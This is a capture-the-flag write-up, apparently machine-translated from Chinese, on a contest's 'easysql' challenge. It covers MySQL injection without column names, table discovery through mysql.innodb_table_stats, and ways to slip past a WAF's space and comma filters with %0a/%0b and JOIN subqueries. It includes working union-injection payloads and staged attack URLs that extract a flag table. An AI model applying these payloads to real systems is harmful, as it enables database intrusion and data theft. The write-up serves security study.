Foreword
For a easysql Shanghai university student network security contest, led me to the accumulation of this article. Because most of the time put in Decade and Babyt5 on, easysql that did not see, and afterwards looked WP, do not understand how it was found, so a lot of understanding.
No column names injection
Premise: easysql in filtered or, so information_schema not be used, need to get the table name by innodb storage engine use, do not know the column names, so the need to inject to obtain field data by no column name.
In fact, the article side watching practice their own records, write their own more detailed, easy to understand more thoroughly.
This is not directly select 1,2,3,4 is a table yet, you can be seen as a virtual table.
We can use this virtual table populated with data tables you want to read through union select (remember when using union, to ensure that the same number of left and right sides of the field, that is, the number of columns)
Then by setting such a virtual table aliases, can be achieved without column names into a
We need to see the data table to import the virtual table, and we have to set as the column name 1,2,3,4
The second column of table data is started we want, can be used to limit or 2,1 fetch limit limit 1 offset 2 (here, the second line are not selected because the comparison data and the lower limit can bypass 2,1 limit commas. 1 offset difference 2 easily confused with the corresponding parameters)
limt 2,1: starting from the third row, a row of data fetch
limit 1 offset2: fetches a row of data, starting from the second row
This completes the no column name injected
innodb storage engine
Because the local is 5.5.53 mysql, I do not want to pull the deployment of a docker, directly copy the contents of the article. (Apology)
Red Hat wp cup, you need to get the name of the table by innodb, the reason is filtered or, lack access to information_schema
Mysql>5.6.x
In Mysql, the default storage engine data into two categories. One is in the 5.5.x before the MyISAM storage engine data, and the other is the 5.5.x version innodb engine. And mysql development team in the 5.5.x version will innodb engine as the default database.
In the starting mysql 5.6.x version, innodb added two new tables, one innodb_index_stats, and the other is innodb_table_stats. Access to official documents, which explain these two new tables below:
From the official documents we can find two useful information:
- Starting 5.6.x version, automatically set when innodb_index_stats and innodb_table_stats data table.
- Two tables are stored in the database and the corresponding data table.
The only regret is that no field name
Local test:
Mysql 5.6.40
innodb_index_stats
select * from mysql.innodb_index_stats limit 0,3;
innodb_table_stats
select * from mysql.innodb_table_stats limit 0,1
Payload: select table_name from mysql.innodb_table_stats where database_name = schema ()
Premise mysql> 5.6x
Look-up table for the payload:
select group_concat(table_name) from mysql.innodb_table_stats where database_name like database()
bypass
For bypass waf there are many Sao posture, put some basic listed.
1. First we have the space to be filtered, there are many methods to bypass this
- Note the use of bypass,
/**/if for '/' is filtered, resulting in this method can not be used - Bypass parentheses, brackets can be used to surround the sub-queries, the results of any statement may be used
()to surround and ends there may be no extra spaces - Symbolic alternative spaces
%20 %09 %0d %0b %0c %0d %a0 %0a, where I chose to%0abe bypassed
2. For, filtration, never had to know to check a lot of information and articles, found a pose
Join
Join bypass comma, with the co-injection payload (found picture may not directly copy and paste the code may result in reproduction is not convenient)
mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec)
(SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;
This form similar to the following
mysql> select*from(select 1,2,3,4)a; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec)
Some queries can be constructed
mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT version())d; +---+---+---+-----------+ | 1 | 2 | 3 | version() | +---+---+---+-----------+ | 1 | 2 | 3 | 5.5.53 | +---+---+---+-----------+ 1 row in set (0.00 sec)
bypass comma, achieve joint injection
select*from people where id=-1 union select*from((select 1)b join (select 2)a join (select 3)c join (select 4)d);
Binding Assay
Because no touch easysql, we can only rely wp be binding assay
first step
1. Try to find echo point, use a comma join bypass filter. /article.php?id=0 'union% 0bselect * from ( select 1) a join (select 2) b join (select 3) c join (select 4) d% 23
By injecting union query to find the injection point, the comma is filtered through the join to bypass comma, burst bit display
The second step
2. Try to burst the table, but is filtered or we choose another system tables mysql.innodb_table_stats. /article.php?id=0 'union% 0bselect * from ( select 1) a join (select (select group_concat (table_name) from mysql.innodb_table_stats where database_name like database ())) b join (select 3) c join (select 4) d% 23
Filtered or, to burst through innodb table name, not a good analysis of the second step is to remember (select (select group_concat (table_name) from mysql.innodb_table_stats where database_name like database ())) b, which can only be a field a data, not a plurality of fields. There are also sub-query can not use limit to limit => (select table_name from mysql.innodb_table_stats where database_name like database ()) b, but not as fast ah group_concat to direct all the table names listed, no limit step by step read the table name.
third step
/article.php?id=0' union%0bselect * from (select 1)z join (select i.3 from (select * from (select 1)a join (select 2)b join (select 3)c union%0bselect * from fl111aa44a99g)i limit 1 offset 1)x join (select 3)v join (select 3)n%23
Here on the next most important part of the analysis
join (select i.3 from (select * from (select 1)a join (select 2)b join (select 3)c union%0bselect * from fl111aa44a99g)i limit 1 offset 1)x
This is by no column name in conjunction join bypass inject a comma.
The only difference is that the (select 1,2,3 union select * from fl111aa44a99g) i is replaced join manner (select * from (select 1) a join (select 2) b join (select 3) c union% 0bselect * from fl111aa44a99g) i
sleep
1.40 a
Learning Link:
https://blog.csdn.net/qq_40500631/article/details/89631904
http://p0desta.com/2018/03/29/SQL%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98%E5%BD%95/#1-10-%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5
https://www.o2oxy.cn/1929.html